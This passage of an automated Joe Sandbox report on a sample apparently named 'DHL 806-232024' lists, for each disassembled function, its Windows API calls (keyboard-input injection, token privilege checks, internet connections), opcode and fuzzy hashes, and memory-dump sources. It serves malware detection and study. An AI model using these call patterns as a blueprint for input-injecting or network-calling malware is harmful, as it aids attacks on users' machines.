                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
                                                                                  • Instruction ID: bc16fce6d17c96a3f332ccad33bd29bac8678c5d4b0d8bbac73436990bbcd30b
                                                                                  • Opcode Fuzzy Hash: 5721055007c7e62a8de883eeaaf49dcd8ae868f42c5476e60cdf03ed38ee309f
                                                                                  • Instruction Fuzzy Hash: 8531E674605208BFEF20DF5ACC55FAB37ADEB05362F244A12FE51F62A0DE34A9489741
                                                                                  APIs
                                                                                  • ClientToScreen.USER32(?,?), ref: 0095AE1A
                                                                                  • GetWindowRect.USER32(?,?), ref: 0095AE90
                                                                                  • PtInRect.USER32(?,?,0095C304), ref: 0095AEA0
                                                                                  • MessageBeep.USER32(00000000), ref: 0095AF11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1352109105-0
                                                                                  • Opcode ID: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
                                                                                  • Instruction ID: f402670e29ca290a51618ec01509616127bab3fe3d341b7eded0b1ee794f73a8
                                                                                  • Opcode Fuzzy Hash: e1d742e2554a87e0719e5534d87612769bf30e66772b0d77bcf75bcdc537245e
                                                                                  • Instruction Fuzzy Hash: D041CF70604209DFCB11CF5AD885B697BF5FF89352F1482A9EC05DB250D730A849DF56
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00931037
                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00931053
                                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009310B9
                                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0093110B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
                                                                                  • Instruction ID: c22ea8a976997c111b712f90e8da32f1a474aab7dc8f937d9d1648b0a12d7b1b
                                                                                  • Opcode Fuzzy Hash: 2c2d4e0f4901b9fd431552f4541f854b1054bb12a32873279f0e91af327b1f09
                                                                                  • Instruction Fuzzy Hash: 6A314B30E44688AEFF388B668C057F9BBADAB88320F04421AF581561F1C37489D19F52
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00931176
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00931192
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 009311F1
                                                                                  • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00931243
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
                                                                                  • Instruction ID: fe605353d409402c2fa03745df5489bde6e23dfdc2a16cf1e6a96ee9705d0ebe
                                                                                  • Opcode Fuzzy Hash: d8579b3a7d79d35b2e587a05ecc1bcc6a690806799b4d7ef8b0926d81b1ff147
                                                                                  • Instruction Fuzzy Hash: 83313A3094870C5EFF348AA68C187FA7BAEAB89320F04475AF591921F1D37849559F61
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0090644B
                                                                                  • __isleadbyte_l.LIBCMT ref: 00906479
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064A7
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009064DD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
                                                                                  • Instruction ID: 155c4ad5c2281d3e9629e39ba3db26ff3d60acc90a2f8efaa15caf9489eff4ef
                                                                                  • Opcode Fuzzy Hash: 6ad180f7b122917408abcf1d058ca88bc0ce677e633f3b762105dbaa5e8a1c86
                                                                                  • Instruction Fuzzy Hash: 4D31AF3160425AEFDB218F79CC85BBA7BA9FF41320F154429F854971E1EB31D860DB90
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00955189
                                                                                    • Part of subcall function 0093387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00933897
                                                                                    • Part of subcall function 0093387D: GetCurrentThreadId.KERNEL32 ref: 0093389E
                                                                                    • Part of subcall function 0093387D: AttachThreadInput.USER32(00000000,?,009352A7), ref: 009338A5
                                                                                  • GetCaretPos.USER32(?), ref: 0095519A
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 009551D5
                                                                                  • GetForegroundWindow.USER32 ref: 009551DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
                                                                                  • Instruction ID: da6be9bc43f8d199a3cd1c6de19f1b98549b053c253dca4be15fdf2c69899ed5
                                                                                  • Opcode Fuzzy Hash: c05bdc0cfe6942c5101a93cb4bd3aed3f1db307e9f5af3e56b3b0903ec584c87
                                                                                  • Instruction Fuzzy Hash: ED312F72900118AFDB00EFA9C885EEFB7FDEF98304F10406AE455E7241EA759E05CBA1
                                                                                  APIs
                                                                                    • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                                                  • GetCursorPos.USER32(?), ref: 0095C7C2
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0090BBFB,?,?,?,?,?), ref: 0095C7D7
                                                                                  • GetCursorPos.USER32(?), ref: 0095C824
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0090BBFB,?,?,?), ref: 0095C85E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  • Opcode ID: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
                                                                                  • Instruction ID: ed6f4afef8106c4dfb34c500f5097474373163956ef954ff72fe5ffc4c2a86e4
                                                                                  • Opcode Fuzzy Hash: 0f259609608cfb25d11b70638647843b8acab02eb5eb1abfc695c19f296bda27
                                                                                  • Instruction Fuzzy Hash: 7231A075600218BFCB15CF5AC898EFA7BBAEB49321F044169FE058B261C7319D55EFA0
                                                                                  APIs
                                                                                    • Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
                                                                                    • Part of subcall function 00928652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
                                                                                    • Part of subcall function 00928652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
                                                                                    • Part of subcall function 00928652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
                                                                                    • Part of subcall function 00928652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00928BEB
                                                                                  • _memcmp.LIBCMT ref: 00928C0E
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00928C44
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00928C4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1592001646-0
                                                                                  • Opcode ID: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
                                                                                  • Instruction ID: 190de50f9766d74c27574e4a6f3d1da81e1a024d12757b528eb73ce6b93559d4
                                                                                  • Opcode Fuzzy Hash: 016e77a47f3b9de1113120fe44358b0869c6b8400d503611aaf6f102aafd04db
                                                                                  • Instruction Fuzzy Hash: EC21AC71E02219EFDB00DFA4D949BEFB7B8EF40355F144099E494A7240DB30AE06DB60
                                                                                  APIs
                                                                                  • __setmode.LIBCMT ref: 008F0BF2
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                                                                  • _fprintf.LIBCMT ref: 008F0C29
                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00926331
                                                                                    • Part of subcall function 008F4CDA: _flsall.LIBCMT ref: 008F4CF3
                                                                                  • __setmode.LIBCMT ref: 008F0C5E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                  • String ID:
                                                                                  • API String ID: 521402451-0
                                                                                  • Opcode ID: cdf2216f68665658d525320e5e9ff18108235c6f5ddac1d0fab5c58cb13d99f5
                                                                                  • Instruction ID: 69c24eb68a251795358ac08e35916be241a60a22fdd5168f46cefe16103429b1
                                                                                  • Opcode Fuzzy Hash: cdf2216f68665658d525320e5e9ff18108235c6f5ddac1d0fab5c58cb13d99f5
                                                                                  • Instruction Fuzzy Hash: 9B11E432A0421C7EDB04B7B8AC46ABF7B69FF81320F14021BF314D7292DE615D969796
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00941A97
                                                                                    • Part of subcall function 00941B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
                                                                                    • Part of subcall function 00941B21: InternetCloseHandle.WININET(00000000), ref: 00941BDD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1463438336-0
                                                                                  • Opcode ID: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
                                                                                  • Instruction ID: b4f4f0f2432e8ceaa88e7eb874e14f8a79adc77d0fab8d42afe86ceac652bc14
                                                                                  • Opcode Fuzzy Hash: 56a904dff1a65ee16b6081ff6683d671e35c90604ba3cb7d286981d06e286363
                                                                                  • Instruction Fuzzy Hash: F721C035204701BFEB169F61CC01FBBBBADFF88711F10041AFA5596661EB71E851ABA0
                                                                                  APIs
                                                                                    • Part of subcall function 0092F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F5BC
                                                                                    • Part of subcall function 0092F5AD: lstrcpyW.KERNEL32(00000000,?,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092F5E2
                                                                                    • Part of subcall function 0092F5AD: lstrcmpiW.KERNEL32(00000000,?,0092E1C4,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?), ref: 0092F613
                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E1DD
                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E203
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0092EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0092E237
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  • Opcode ID: bc74cc6ea9065c7c0d13b18aa4f52523f789c4df341e2a51fa6f36dee425c354
                                                                                  • Instruction ID: ebcf3625d89c4506b92f1674e448805c6bb9adfe5d58f5494a2a8a9fc5fe59f6
                                                                                  • Opcode Fuzzy Hash: bc74cc6ea9065c7c0d13b18aa4f52523f789c4df341e2a51fa6f36dee425c354
                                                                                  • Instruction Fuzzy Hash: 4211BE36204315EFCB25AF74E885E7A77BCFF84350B40402AF816CB2A8EB719850D7A0
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00905351
                                                                                    • Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                                                    • Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
                                                                                    • Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
                                                                                  • Instruction ID: 7143e846d785f827ee5087700180d90fe0ed179ec404125032aa140ce7e22f2d
                                                                                  • Opcode Fuzzy Hash: 85ecc728b172c37cb5f7fca5717d0e607c20ad8a6692dd1e720d550292642dfa
                                                                                  • Instruction Fuzzy Hash: 9611BC32508A19EECB213B78AC0566E3B98EF143E0B21482AFA04DB1D0DAB589409B91
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 008D4560
                                                                                    • Part of subcall function 008D410D: _memset.LIBCMT ref: 008D418D
                                                                                    • Part of subcall function 008D410D: _wcscpy.LIBCMT ref: 008D41E1
                                                                                    • Part of subcall function 008D410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 008D45B5
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D45C4
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0090D6CE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1378193009-0
                                                                                  • Opcode ID: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
                                                                                  • Instruction ID: a2d86a8ec1b8739e3e84a2cd44cb6f2eb47cd709ea9a3ccfb7349d5a3cde6602
                                                                                  • Opcode Fuzzy Hash: 85fdf4aa4cc2da5e37beadc3c2c1c6c611082ec4b6c64be38f13e2541cdeeb2c
                                                                                  • Instruction Fuzzy Hash: DE212670909784AFEB328B64DC55BEBBBECEF01318F00009EE29E96281C7755A84DB51
                                                                                  APIs
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00937B20,?,?,00000000), ref: 008D5B8C
                                                                                    • Part of subcall function 008D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00937B20,?,?,00000000,?,?), ref: 008D5BB0
                                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 009466AC
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009466B7
                                                                                  • _memmove.LIBCMT ref: 009466E4
                                                                                  • inet_ntoa.WSOCK32(?), ref: 009466EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 1504782959-0
                                                                                  • Opcode ID: 5c6d17750aae240a24607e8e314124fce496d2bb872cde189d3f2a84495259e4
                                                                                  • Instruction ID: fd78022b14feaab3e49f25633349861fceb0bc92cabad645fbdf6b93d8521e5d
                                                                                  • Opcode Fuzzy Hash: 5c6d17750aae240a24607e8e314124fce496d2bb872cde189d3f2a84495259e4
                                                                                  • Instruction Fuzzy Hash: C5114C75500609ABCB00EBA8D996DEEB7B8FF44321B144166F502E7261DF30AE04DB62
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00929043
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929055
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092906B
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00929086
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
                                                                                  • Instruction ID: a695fa15c3964655df57dec3570881cfdc6276c726d0f0a77854c6dad6234b17
                                                                                  • Opcode Fuzzy Hash: fea8a1854e2d8bffbf4a70f2a3e442a6c83ed85ee264c993baaa1ca59713fb83
                                                                                  • Instruction Fuzzy Hash: 8A115E79941218FFEB10DFA5CC84F9DBBB8FB48710F2040A5EA04B7254D6716E10DB90
                                                                                  APIs
